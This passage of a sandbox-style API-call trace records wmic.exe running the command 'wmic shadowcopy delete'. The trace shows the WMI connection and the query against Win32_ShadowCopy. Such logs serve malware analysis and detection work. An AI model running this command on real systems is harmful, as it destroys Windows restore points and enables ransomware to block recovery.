IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0074.242] malloc (_Size=0xc) returned 0x14fe28 [0074.242] malloc (_Size=0xc) returned 0x14fe40 [0074.242] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0074.242] SysStringLen (param_1="TABLE") returned 0x5 [0074.242] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0074.242] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.242] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0074.242] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0074.242] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0074.242] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0074.242] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0074.242] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0074.242] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0074.242] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0074.242] malloc (_Size=0x18) returned 0x14eb68 [0074.242] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.242] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.242] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.243] IUnknown:Release (This=0x23e8e80) returned 0x0 [0074.243] FreeThreadedDOMDocument:IUnknown:Release (This=0x23e8c58) returned 0x1 [0074.243] FreeThreadedDOMDocument:IUnknown:Release (This=0x23e4630) returned 0x0 [0074.243] free (_Block=0x142f08) [0074.243] GetCommandLineW () returned="wmic shadowcopy delete" [0074.243] malloc (_Size=0x30) returned 0x143140 [0074.243] memcpy_s (in: _Destination=0x143140, _DestinationSize=0x2e, _Source=0x4d199c, _SourceSize=0x2e | out: _Destination=0x143140) returned 0x0 [0074.243] malloc (_Size=0xc) returned 0x14fe58 [0074.243] malloc (_Size=0xc) returned 0x14fe70 [0074.243] malloc (_Size=0xc) returned 0x14fe88 [0074.243] malloc (_Size=0xc) returned 0x2422060 [0074.243] malloc (_Size=0x80) returned 0x24204a0 [0074.243] GetLocalTime (in: lpSystemTime=0x26fb04 | out: lpSystemTime=0x26fb04*(wYear=0x7e3, wMonth=0xa, wDayOfWeek=0x6, wDay=0x5, wHour=0xb, wMinute=0x2, wSecond=0x30, wMilliseconds=0x111)) [0074.243] _vsnwprintf (in: _Buffer=0x24204a0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x26fae4 | out: _Buffer="10-05-2019T11:02:48") returned 19 [0074.243] lstrlenW (lpString=" shadowcopy delete") returned 19 [0074.243] malloc (_Size=0x28) returned 0x143178 [0074.243] lstrlenW (lpString=" shadowcopy delete") returned 19 [0074.243] lstrlenW (lpString=" shadowcopy delete") returned 19 [0074.243] malloc (_Size=0x28) returned 0x1431a8 [0074.243] lstrlenW (lpString=" shadowcopy delete") returned 19 [0074.243] lstrlenW (lpString=" shadowcopy delete") returned 19 [0074.243] lstrlenW (lpString=" shadowcopy delete") returned 19 [0074.244] malloc (_Size=0x16) returned 0x14eb88 [0074.244] lstrlenW (lpString="shadowcopy") returned 10 [0074.244] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0074.244] malloc (_Size=0x16) returned 0x14eba8 [0074.244] malloc (_Size=0x4) returned 0x142f08 [0074.244] free (_Block=0x0) [0074.244] free (_Block=0x14eb88) [0074.244] lstrlenW (lpString=" shadowcopy delete") returned 19 [0074.244] malloc (_Size=0xe) returned 0x2422078 [0074.244] lstrlenW (lpString="delete") returned 6 [0074.244] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0074.244] malloc (_Size=0xe) returned 0x2422090 [0074.244] malloc (_Size=0x8) returned 0x1431d8 [0074.244] memmove_s (in: _Destination=0x1431d8, _DestinationSize=0x4, _Source=0x142f08, _SourceSize=0x4 | out: _Destination=0x1431d8) returned 0x0 [0074.244] free (_Block=0x142f08) [0074.244] free (_Block=0x0) [0074.244] free (_Block=0x2422078) [0074.244] malloc (_Size=0x8) returned 0x142f08 [0074.244] lstrlenW (lpString="QUIT") returned 4 [0074.244] lstrlenW (lpString="shadowcopy") returned 10 [0074.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0074.244] lstrlenW (lpString="EXIT") returned 4 [0074.244] lstrlenW (lpString="shadowcopy") returned 10 [0074.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0074.244] free (_Block=0x142f08) [0074.244] WbemLocator:IUnknown:AddRef (This=0xa60828) returned 0x2 [0074.244] malloc (_Size=0x8) returned 0x142f08 [0074.244] lstrlenW (lpString="/") returned 1 [0074.244] lstrlenW (lpString="shadowcopy") returned 10 [0074.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0074.244] lstrlenW (lpString="-") returned 1 [0074.244] lstrlenW (lpString="shadowcopy") returned 10 [0074.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0074.244] lstrlenW (lpString="CLASS") returned 5 [0074.245] lstrlenW (lpString="shadowcopy") returned 10 [0074.245] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0074.245] lstrlenW (lpString="PATH") returned 4 [0074.245] lstrlenW (lpString="shadowcopy") returned 10 [0074.245] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0074.245] lstrlenW (lpString="CONTEXT") returned 7 [0074.245] lstrlenW (lpString="shadowcopy") returned 10 [0074.245] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0074.245] lstrlenW (lpString="shadowcopy") returned 10 [0074.245] malloc (_Size=0x16) returned 0x14eb88 [0074.245] lstrlenW (lpString="shadowcopy") returned 10 [0074.245] GetCurrentThreadId () returned 0x8b0 [0074.245] ??0CHString@@QAE@XZ () returned 0x26fa58 [0074.245] malloc (_Size=0xc) returned 0x2422078 [0074.245] malloc (_Size=0xc) returned 0x24220a8 [0074.245] WbemLocator:IWbemLocator:ConnectServer (in: This=0xa60828, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xe4c1e0 | out: ppNamespace=0xe4c1e0*=0xa6d00c) returned 0x0 [0074.326] free (_Block=0x24220a8) [0074.326] free (_Block=0x2422078) [0074.327] CoSetProxyBlanket (pProxy=0xa6d00c, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0074.327] ??1CHString@@QAE@XZ () returned 0x74290504 [0074.327] GetCurrentThreadId () returned 0x8b0 [0074.327] ??0CHString@@QAE@XZ () returned 0x26f9f0 [0074.327] malloc (_Size=0xc) returned 0x2422078 [0074.327] malloc (_Size=0xc) returned 0x24220a8 [0074.327] malloc (_Size=0xc) returned 0x24220c0 [0074.327] malloc (_Size=0xc) returned 0x24220d8 [0074.327] SysStringLen (param_1="root\\cli") returned 0x8 [0074.327] SysStringLen (param_1="\\") returned 0x1 [0074.327] malloc (_Size=0xc) returned 0x24220f0 [0074.327] SysStringLen (param_1="root\\cli\\") returned 0x9 [0074.327] SysStringLen (param_1="ms_409") returned 0x6 [0074.328] free (_Block=0x24220d8) [0074.328] free (_Block=0x24220c0) [0074.328] free (_Block=0x24220a8) [0074.328] free (_Block=0x2422078) [0074.328] malloc (_Size=0xc) returned 0x2422078 [0074.328] WbemLocator:IWbemLocator:ConnectServer (in: This=0xa60828, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xe4c1e4 | out: ppNamespace=0xe4c1e4*=0xa6d064) returned 0x0 [0074.353] free (_Block=0x2422078) [0074.353] free (_Block=0x24220f0) [0074.353] ??1CHString@@QAE@XZ () returned 0x74290504 [0074.353] GetCurrentThreadId () returned 0x8b0 [0074.354] ??0CHString@@QAE@XZ () returned 0x26fa5c [0074.354] malloc (_Size=0xc) returned 0x24220f0 [0074.354] malloc (_Size=0xc) returned 0x2422078 [0074.354] malloc (_Size=0xc) returned 0x24220a8 [0074.354] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0074.354] malloc (_Size=0x3a) returned 0x14feb0 [0074.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe01f7c, cbMultiByte=-1, lpWideCharStr=0x14feb0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0074.354] free (_Block=0x14feb0) [0074.354] malloc (_Size=0xc) returned 0x24220c0 [0074.354] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0074.354] SysStringLen (param_1="shadowcopy") returned 0xa [0074.354] malloc (_Size=0xc) returned 0x24220d8 [0074.354] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0074.354] SysStringLen (param_1="'") returned 0x1 [0074.354] free (_Block=0x24220c0) [0074.354] free (_Block=0x24220a8) [0074.354] free (_Block=0x2422078) [0074.354] free (_Block=0x24220f0) [0074.354] IWbemServices:GetObject (in: This=0xa6d00c, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x26fa58*=0x0, ppCallResult=0x0 | out: ppObject=0x26fa58*=0xa79a18, ppCallResult=0x0) returned 0x0 [0074.463] malloc (_Size=0xc) returned 0x24220f0 [0074.463] IWbemClassObject:Get (in: This=0xa79a18, wszName="Target", lFlags=0, pVal=0x26fa18*(varType=0x0, wReserved1=0x26, wReserved2=0xe58c, wReserved3=0xe3, varVal1=0xffffffff, varVal2=0xe0a03c), pType=0x0, plFlavor=0x0 | out: pVal=0x26fa18*(varType=0x8, wReserved1=0x26, wReserved2=0xe58c, wReserved3=0xe3, varVal1="Select * from Win32_ShadowCopy", varVal2=0xe0a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0074.463] free (_Block=0x24220f0) [0074.463] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0074.463] malloc (_Size=0x3e) returned 0x14feb0 [0074.463] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0074.463] malloc (_Size=0xc) returned 0x24220f0 [0074.463] IWbemClassObject:Get (in: This=0xa79a18, wszName="PWhere", lFlags=0, pVal=0x26fa18*(varType=0x0, wReserved1=0x26, wReserved2=0xe58c, wReserved3=0xe3, varVal1=0x4f503c, varVal2=0xe0a03c), pType=0x0, plFlavor=0x0 | out: pVal=0x26fa18*(varType=0x8, wReserved1=0x26, wReserved2=0xe58c, wReserved3=0xe3, varVal1=" Where ID = '#'", varVal2=0xe0a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0074.464] free (_Block=0x24220f0) [0074.464] lstrlenW (lpString=" Where ID = '#'") returned 15 [0074.464] malloc (_Size=0x20) returned 0x14fef8 [0074.464] lstrlenW (lpString=" Where ID = '#'") returned 15 [0074.464] malloc (_Size=0xc) returned 0x24220f0 [0074.464] IWbemClassObject:Get (in: This=0xa79a18, wszName="Connection", lFlags=0, pVal=0x26fa18*(varType=0x0, wReserved1=0x26, wReserved2=0xe58c, wReserved3=0xe3, varVal1=0x52486c, varVal2=0xe0a03c), pType=0x0, plFlavor=0x0 | out: pVal=0x26fa18*(varType=0xd, wReserved1=0x26, wReserved2=0xe58c, wReserved3=0xe3, varVal1=0xa79dd8, varVal2=0xe0a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0074.465] free (_Block=0x24220f0) [0074.465] IUnknown:QueryInterface (in: This=0xa79dd8, riid=0xe06b50*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26fa50 | out: ppvObject=0x26fa50*=0xa79dd8) returned 0x0 [0074.465] GetCurrentThreadId () returned 0x8b0 [0074.465] ??0CHString@@QAE@XZ () returned 0x26f9cc [0074.465] malloc (_Size=0xc) returned 0x24220f0 [0074.465] IWbemClassObject:Get (in: This=0xa79dd8, wszName="Namespace", lFlags=0, pVal=0x26f99c*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x242, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f99c*(varType=0x8, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x242, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0074.465] free (_Block=0x24220f0) [0074.465] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0074.465] malloc (_Size=0x16) returned 0x14ebc8 [0074.465] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0074.465] malloc (_Size=0xc) returned 0x24220f0 [0074.465] IWbemClassObject:Get (in: This=0xa79dd8, wszName="Locale", lFlags=0, pVal=0x26f99c*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x242, varVal1=0x5342fc, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f99c*(varType=0x8, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x242, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0074.465] free (_Block=0x24220f0) [0074.465] lstrlenW (lpString="ms_409") returned 6 [0074.465] malloc (_Size=0xe) returned 0x24220f0 [0074.466] lstrlenW (lpString="ms_409") returned 6 [0074.466] malloc (_Size=0xc) returned 0x2422078 [0074.466] IWbemClassObject:Get (in: This=0xa79dd8, wszName="User", lFlags=0, pVal=0x26f99c*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x242, varVal1=0x5342fc, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f99c*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x242, varVal1=0x5342fc, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0074.466] free (_Block=0x2422078) [0074.466] malloc (_Size=0xc) returned 0x2422078 [0074.466] IWbemClassObject:Get (in: This=0xa79dd8, wszName="Password", lFlags=0, pVal=0x26f99c*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x242, varVal1=0x5342fc, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f99c*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x242, varVal1=0x5342fc, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0074.466] free (_Block=0x2422078) [0074.466] malloc (_Size=0xc) returned 0x2422078 [0074.466] IWbemClassObject:Get (in: This=0xa79dd8, wszName="Server", lFlags=0, pVal=0x26f99c*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x242, varVal1=0x5342fc, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f99c*(varType=0x8, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x242, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0074.466] free (_Block=0x2422078) [0074.466] lstrlenW (lpString=".") returned 1 [0074.466] malloc (_Size=0x4) returned 0x1431e8 [0074.466] lstrlenW (lpString=".") returned 1 [0074.466] malloc (_Size=0xc) returned 0x2422078 [0074.466] IWbemClassObject:Get (in: This=0xa79dd8, wszName="Authority", lFlags=0, pVal=0x26f99c*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x242, varVal1=0x5342fc, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f99c*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x242, varVal1=0x5342fc, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0074.466] free (_Block=0x2422078) [0074.466] ??1CHString@@QAE@XZ () returned 0x74290504 [0074.466] IUnknown:Release (This=0xa79dd8) returned 0x1 [0074.466] GetCurrentThreadId () returned 0x8b0 [0074.466] ??0CHString@@QAE@XZ () returned 0x26f9c4 [0074.466] malloc (_Size=0xc) returned 0x2422078 [0074.466] IWbemClassObject:Get (in: This=0xa79a18, wszName="__RELPATH", lFlags=0, pVal=0x26f9a4*(varType=0x0, wReserved1=0x741c, wReserved2=0x0, wReserved3=0xa6, varVal1=0x0, varVal2=0xa79dd8), pType=0x0, plFlavor=0x0 | out: pVal=0x26f9a4*(varType=0x8, wReserved1=0x741c, wReserved2=0x0, wReserved3=0xa6, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xa79dd8), pType=0x0, plFlavor=0x0) returned 0x0 [0074.467] free (_Block=0x2422078) [0074.467] malloc (_Size=0xc) returned 0x2422078 [0074.467] GetCurrentThreadId () returned 0x8b0 [0074.467] ??0CHString@@QAE@XZ () returned 0x26f954 [0074.467] ??0CHString@@QAE@PBG@Z () returned 0x26f940 [0074.467] ??0CHString@@QAE@ABV0@@Z () returned 0x26f8e0 [0074.467] ?Empty@CHString@@QAEXXZ () returned 0x74290510 [0074.467] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x14ff20 [0074.467] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0074.467] ?Left@CHString@@QBE?AV1@H@Z () returned 0x26f8c0 [0074.467] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x26f8c4 [0074.467] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x26f940 [0074.467] ??1CHString@@QAE@XZ () returned 0x1 [0074.467] ??1CHString@@QAE@XZ () returned 0x1 [0074.467] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x26f8bc [0074.467] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x26f8e0 [0074.467] ??1CHString@@QAE@XZ () returned 0x1 [0074.467] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x2422448 [0074.467] ?Find@CHString@@QBEHPBG@Z () returned 0xa [0074.467] ?Left@CHString@@QBE?AV1@H@Z () returned 0x26f8c0 [0074.467] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x26f8c4 [0074.467] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x26f940 [0074.467] ??1CHString@@QAE@XZ () returned 0x1 [0074.467] ??1CHString@@QAE@XZ () returned 0x1 [0074.467] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x26f8bc [0074.467] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x26f8e0 [0074.467] ??1CHString@@QAE@XZ () returned 0x74290504 [0074.467] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74290504 [0074.467] ??1CHString@@QAE@XZ () returned 0x74290504 [0074.467] malloc (_Size=0xc) returned 0x24220a8 [0074.467] malloc (_Size=0xc) returned 0x24220c0 [0074.468] malloc (_Size=0xc) returned 0x2422108 [0074.468] malloc (_Size=0xc) returned 0x2422120 [0074.468] malloc (_Size=0xc) returned 0x2422138 [0074.468] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0074.468] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0074.468] malloc (_Size=0xc) returned 0x2422150 [0074.468] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0074.468] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0074.468] malloc (_Size=0xc) returned 0x2422168 [0074.468] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0074.468] SysStringLen (param_1="\"") returned 0x1 [0074.468] free (_Block=0x2422150) [0074.468] free (_Block=0x2422138) [0074.468] free (_Block=0x2422120) [0074.468] free (_Block=0x2422108) [0074.469] free (_Block=0x24220c0) [0074.469] free (_Block=0x24220a8) [0074.469] IWbemServices:GetObject (in: This=0xa6d064, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x26f95c*=0x0, ppCallResult=0x0 | out: ppObject=0x26f95c*=0xa79e68, ppCallResult=0x0) returned 0x0 [0074.479] malloc (_Size=0xc) returned 0x24220a8 [0074.479] IWbemClassObject:Get (in: This=0xa79e68, wszName="Text", lFlags=0, pVal=0x26f908*(varType=0x0, wReserved1=0x4f, wReserved2=0x3e3c, wReserved3=0x4f, varVal1=0x4e, varVal2=0xe4c1e0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f908*(varType=0x2008, wReserved1=0x4f, wReserved2=0x3e3c, wReserved3=0x4f, varVal1=0x518518*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x527130, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xe4c1e0), pType=0x0, plFlavor=0x0) returned 0x0 [0074.479] free (_Block=0x24220a8) [0074.479] SafeArrayGetLBound (in: psa=0x518518, nDim=0x1, plLbound=0x26f920 | out: plLbound=0x26f920) returned 0x0 [0074.479] SafeArrayGetUBound (in: psa=0x518518, nDim=0x1, plUbound=0x26f91c | out: plUbound=0x26f91c) returned 0x0 [0074.479] SafeArrayGetElement (in: psa=0x518518, rgIndices=0x26f980, pv=0x26f948 | out: pv=0x26f948) returned 0x0 [0074.479] malloc (_Size=0xc) returned 0x24220a8 [0074.479] malloc (_Size=0xc) returned 0x24220c0 [0074.479] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0074.480] free (_Block=0x24220a8) [0074.480] IUnknown:Release (This=0xa79e68) returned 0x0 [0074.480] free (_Block=0x2422168) [0074.480] ??1CHString@@QAE@XZ () returned 0x1 [0074.480] ??1CHString@@QAE@XZ () returned 0x74290504 [0074.480] free (_Block=0x2422078) [0074.480] ??1CHString@@QAE@XZ () returned 0x74290504 [0074.480] lstrlenW (lpString="Shadow copy management.") returned 23 [0074.480] malloc (_Size=0x30) returned 0x14ff20 [0074.480] lstrlenW (lpString="Shadow copy management.") returned 23 [0074.480] free (_Block=0x24220c0) [0074.480] IUnknown:Release (This=0xa79a18) returned 0x0 [0074.480] free (_Block=0x24220d8) [0074.480] ??1CHString@@QAE@XZ () returned 0x74290504 [0074.480] lstrlenW (lpString="PATH") returned 4 [0074.480] lstrlenW (lpString="delete") returned 6 [0074.480] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0074.480] lstrlenW (lpString="WHERE") returned 5 [0074.480] lstrlenW (lpString="delete") returned 6 [0074.480] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0074.480] lstrlenW (lpString="(") returned 1 [0074.480] lstrlenW (lpString="delete") returned 6 [0074.480] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0074.480] lstrlenW (lpString="/") returned 1 [0074.480] lstrlenW (lpString="delete") returned 6 [0074.480] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0074.480] lstrlenW (lpString="-") returned 1 [0074.481] lstrlenW (lpString="delete") returned 6 [0074.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0074.481] malloc (_Size=0xc) returned 0x24220d8 [0074.481] lstrlenW (lpString="GET") returned 3 [0074.481] lstrlenW (lpString="delete") returned 6 [0074.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0074.481] lstrlenW (lpString="LIST") returned 4 [0074.481] lstrlenW (lpString="delete") returned 6 [0074.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0074.481] lstrlenW (lpString="SET") returned 3 [0074.481] lstrlenW (lpString="delete") returned 6 [0074.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0074.481] lstrlenW (lpString="CREATE") returned 6 [0074.481] lstrlenW (lpString="delete") returned 6 [0074.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0074.481] lstrlenW (lpString="CALL") returned 4 [0074.481] lstrlenW (lpString="delete") returned 6 [0074.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0074.481] lstrlenW (lpString="ASSOC") returned 5 [0074.481] lstrlenW (lpString="delete") returned 6 [0074.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0074.481] lstrlenW (lpString="DELETE") returned 6 [0074.481] lstrlenW (lpString="delete") returned 6 [0074.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0074.481] free (_Block=0x24220d8) [0074.481] lstrlenW (lpString="/") returned 1 [0074.481] lstrlenW (lpString="delete") returned 6 [0074.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0074.481] lstrlenW (lpString="-") returned 1 [0074.481] lstrlenW (lpString="delete") returned 6 [0074.482] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0074.482] lstrlenW (lpString="delete") returned 6 [0074.482] malloc (_Size=0xe) returned 0x24220d8 [0074.482] lstrlenW (lpString="delete") returned 6 [0074.482] lstrlenW (lpString="GET") returned 3 [0074.482] lstrlenW (lpString="delete") returned 6 [0074.482] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0074.482] lstrlenW (lpString="LIST") returned 4 [0074.482] lstrlenW (lpString="delete") returned 6 [0074.482] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0074.482] lstrlenW (lpString="SET") returned 3 [0074.482] lstrlenW (lpString="delete") returned 6 [0074.482] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0074.482] lstrlenW (lpString="CREATE") returned 6 [0074.482] lstrlenW (lpString="delete") returned 6 [0074.482] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0074.482] lstrlenW (lpString="CALL") returned 4 [0074.482] lstrlenW (lpString="delete") returned 6 [0074.482] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0074.482] lstrlenW (lpString="ASSOC") returned 5 [0074.482] lstrlenW (lpString="delete") returned 6 [0074.482] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0074.482] lstrlenW (lpString="DELETE") returned 6 [0074.482] lstrlenW (lpString="delete") returned 6 [0074.482] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0074.482] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0074.482] malloc (_Size=0x3e) returned 0x14ff58 [0074.482] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0074.482] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x1e160dd5 | out: _String="Select", _Context=0x1e160dd5) returned="Select" [0074.482] malloc (_Size=0xc) returned 0x24220c0 [0074.482] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1e160dd5 | out: _String=0x0, _Context=0x1e160dd5) returned="*" [0074.482] lstrlenW (lpString="FROM") returned 4 [0074.483] lstrlenW (lpString="*") returned 1 [0074.483] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0074.483] malloc (_Size=0xc) returned 0x2422078 [0074.483] free (_Block=0x24220c0) [0074.483] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1e160dd5 | out: _String=0x0, _Context=0x1e160dd5) returned="from" [0074.483] lstrlenW (lpString="FROM") returned 4 